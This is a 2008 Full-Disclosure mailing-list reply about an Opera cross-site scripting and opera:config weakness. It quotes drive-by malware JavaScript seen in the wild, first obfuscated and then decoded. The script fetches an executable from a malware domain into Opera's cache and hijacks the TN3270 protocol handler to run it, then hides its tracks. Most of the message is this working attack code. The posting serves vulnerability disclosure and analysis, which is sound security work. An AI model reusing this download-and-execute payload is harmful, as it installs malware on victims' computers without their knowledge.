Date: Thu, 23 Oct 2008 16:12:27 +0200 (CEST) From: Kanedaaa Bohater <kaneda@...ater.net> To: full-disclosure@...ts.grok.org.uk Subject: Re: Opera Stored Cross Site Scripting > Just found a way to use Stefano's opera:config idea to execute code from > remote. Hi. 3 months ago I found on some malware site (www.google.com.update.login.jsp.podavanda.cn), that when Your UserAgent was Opera - they send to You code similar to Yours, but they first download malware .exe file to opera:cache (Opera use pre_downloading files) and later change tn3270:// protocol to this file (but without opera:historysearch). It was probably for older Opera version... <script> blank_iframe = document.createElement("ihfcrdahmdeR".replace(/[hc4dR]/g, '')); blank_iframe.src = "aYbYoYuct9:sbYlca9nck9".replace(/[Ycys9]/g, ''); blank_iframe.setAttribute("srtGy9lBe9".replace(/[9GBnr]/g, ''), "dRi~sRpPlRa~yc:~nSoSnPec".replace(/[cPR~S]/g, '')); blank_iframe.setAttribute("icdV".replace(/[#cARV]/g, ''), "bLlPaPn@...Bi@f@...Bm4eP_LwLiLn4dPoLw4".replace(/[P@BL4]/g, '')); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement("iAfWrEajmAeE".replace(/[jEWLA]/g, ''));\ config_iframe.setAttribute("iqdw".replace(/[q3wu#]/g, ''), "cboKnIfSiSgb_IibfKrIaSmbeI_uwKiKnSdboSwu".replace(/[IKSub]/g, ''));\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement("sncnr9inpXta".replace(/[9aXqn]/g, ''));\ cache_iframe = document.createElement("iUfurBaumBeB".replace(/[1lBUu]/g, ''));\ app_iframe.src = "hUtUtUpY:y/y/UwUwYwU.@...yo@...ye@...yoXmY.Xu@...YaytYeU.UlYoygXiyny.Uj@s@pX.@...Xd@...YaynydXaY.yc@...XI@I@...yxXlXoUaydUe@r@.ye@...X".replace(/[UXYy@]/g, '');\ app_iframe.onload = function ()\ {\ cache_iframe.src = "oApAeArVaR:AcRaVcAhVeR".replace(/[AVqKR]/g, '');\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new 
RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference("NReRtRwpour!kp".replace(/[%u\!Rp]/g, ''),"T!N#34247K0K 4AKp!p#".replace(/[\!4#YK]/g, ''),opera.getPreference("UjsaeYrw wPYrYeaf3sw".replace(/[aY3jw]/g, ''),"Cla8c8hZes sD8isrZeHcZt8olrlyl4H".replace(/[8lZsH]/g, ''))+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute("hsr%eWfW".replace(/[@3s%W]/g, ''), "tvnv3e2v7v0v:C/J/vnJoWtWheiJnWge".replace(/[CvJWe]/g, ''));\ app_link.click();\ setTimeout(function(){opera.setPreference("NjeCtSwjo7rjkS".replace(/[C7Sgj]/g, ''),"TPND3r2#7r0# PAPprpP".replace(/[P#DZr]/g, ''),"theClhnje~t~.jehxje~".replace(/[w~Cjh]/g, ''))},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script> which was something like: <script> blank_iframe = document.createElement("iframe"); blank_iframe.src = "about:blank"; blank_iframe.setAttribute("style", "display:none"); blank_iframe.setAttribute("id"), "blank_iframe_window"); document.appendChild(blank_iframe); blank_iframe_window.eval ("config_iframe = document.createElement("iframe");\ config_iframe.setAttribute("id", "config_iframe_window");\ config_iframe.src = 'opera:config';\ document.appendChild(config_iframe);\ app_iframe = document.createElement("script");\ cache_iframe = document.createElement("iframe");\ app_iframe.src = "hxxp://www.google.com.update.login.jsp.podavanda.cn/IIl/xloader.exe";\ app_iframe.onload = function ()\ {\ cache_iframe.src = "opera:cache";\ cache_iframe.onload = function ()\ {\ cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\ var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\ filename = cache.match(re);\ config_iframe_window.eval\ (\"\ opera.setPreference("Network","TN3270 App",opera.getPreference("User 
Prefs","Cache Directory4")+parent.filename[1]);\ app_link = document.createElement('a');\ app_link.setAttribute("href", "tn3270://nothing");\ app_link.click();\ setTimeout(function(){opera.setPreference("Network","TN3270 App","telnet.exe~")},1000);\ \");\ };\ document.appendChild(cache_iframe);\ };\ document.appendChild(app_iframe);"); </script> but unfortunately I dont have to much time for test... -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][].. [+] You can take our lives,but you will never take our Freedom - W.Wallace [+] Peace on earth depends on the peace in the peoples hearts - Dalai Lama [+] Revolution the only solution - System of a down... [+] Dalej idac dalej dojdziesz dalej siedzac dalej siedzisz - etoe aka ok0 [-] Kanedaaa... Bohateur... Cucumber Team Member... kaneda@...ater.net _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/